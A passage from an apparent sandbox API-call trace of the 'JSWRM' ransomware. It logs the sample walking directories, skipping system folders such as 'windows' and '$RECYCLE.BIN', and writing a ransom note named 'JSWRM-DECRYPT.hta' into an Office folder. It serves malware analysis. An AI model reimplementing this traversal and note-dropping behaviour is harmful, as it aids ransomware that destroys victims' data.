ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1fa2d16a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.753] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.753] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.753] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa2d16a, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa2d16a, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa2d16a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.753] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0068.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.754] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9e7b530, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x58cd0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="LICLUA.EXE", cAlternateFileName="")) returned 1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2=".") returned 1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="..") returned 1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="...") returned 1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="windows") returned -1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="recovery") returned -1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="perflogs") returned -1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="documents and settings") returned 1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="$RECYCLE.BIN") returned 1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="system volume information") returned -1 [0068.754] lstrcmpiW (lpString1="LICLUA.EXE", lpString2="msocache") returned -1 [0068.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICLUA.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICLUA.EXE", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LICLUA.EXE", lpUsedDefaultChar=0x0) returned 10 [0068.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICLUA.EXE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LICLUA.EXE", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LICLUA.EXE", lpUsedDefaultChar=0x0) returned 10 [0068.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0068.754] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2=".") returned 1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2="..") returned 1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2="...") returned 1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2="windows") returned -1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2="recovery") returned -1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2="perflogs") returned -1 [0068.754] lstrcmpiW (lpString1="Office Setup Controller", lpString2="documents and settings") returned 1 [0068.755] lstrcmpiW (lpString1="Office Setup Controller", lpString2="$RECYCLE.BIN") returned 1 [0068.755] lstrcmpiW (lpString1="Office Setup Controller", lpString2="system volume information") returned -1 [0068.755] lstrcmpiW (lpString1="Office Setup Controller", lpString2="msocache") returned 1 [0068.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0068.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0068.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0068.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0068.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\jswrm-decrypt.hta")) returned 0xffffffff [0068.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0068.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0068.757] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0068.757] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0068.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.759] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.759] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.760] CloseHandle (hObject=0x454) returned 1 [0068.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0068.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0068.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0068.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0068.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0068.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0068.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0068.760] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\jswrm-decrypt.hta")) returned 0x20 [0068.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0068.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0068.760] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa536bc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0068.760] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.760] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1fa536bc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName="..", cAlternateFileName="")) returned 1 [0068.760] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.760] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.760] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa536bc, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa536bc, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa536bc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.760] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.761] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0068.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0068.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0068.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0068.761] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.761] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x168258, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2=".") returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="..") returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="...") returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="windows") returned -1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="recovery") returned -1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="perflogs") returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="documents and settings") returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="system volume information") returned -1 [0068.761] lstrcmpiW (lpString1="pidgenx.dll", lpString2="msocache") returned 1 [0068.761] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pidgenx.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pidgenx.dll", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgenx.dll", lpUsedDefaultChar=0x0) returned 11 [0068.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pidgenx.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pidgenx.dll", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgenx.dll", lpUsedDefaultChar=0x0) returned 11 [0068.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0068.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0068.762] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e1fe00, ftCreationTime.dwHighDateTime=0x1d0d79d, ftLastAccessTime.dwLowDateTime=0xda982389, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x69e1fe00, ftLastWriteTime.dwHighDateTime=0x1d0d79d, nFileSizeHigh=0x0, nFileSizeLow=0x902bb, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="...") returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="windows") returned -1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="recovery") returned -1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="perflogs") returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="documents and settings") returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="system volume information") returned -1 [0068.762] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="msocache") returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0068.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241100, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0068.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0068.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.762] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0068.763] CreateFileW (lpFileName="C:\\Program 